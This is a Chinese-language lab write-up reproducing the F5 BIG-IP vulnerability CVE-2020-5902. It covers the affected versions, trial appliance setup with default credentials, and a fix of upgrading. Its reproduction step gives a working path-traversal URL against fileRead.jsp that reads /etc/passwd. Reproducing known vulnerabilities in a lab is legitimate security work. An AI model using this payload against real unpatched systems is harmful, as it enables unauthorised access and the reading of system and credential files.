F5 BIG-IP远程代码执行漏洞复现（CVE-2020-5902）

前言

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

环境搭建

在下面页面登录注册，之后申请秘钥

https://www.f5.com.cn/trials/big-ip-virtual-edition

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v11.x&ver=11.6.4

选择存在漏洞的版本

下载完成后在虚拟机-文件-打开

其他全都默认设置
账号，密码

root

default

配置ip地址

config

默认即可

访问管理页面

https://192.168.2.112/

账号，密码

admin admin

点击next输入证书激活

这个邮件会发送到注册的邮箱

将生成的license粘贴到下面的网页去激活

将获得的license粘贴回第三部

重新登录
激活成功

漏洞复现

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

修复建议

升级到最新版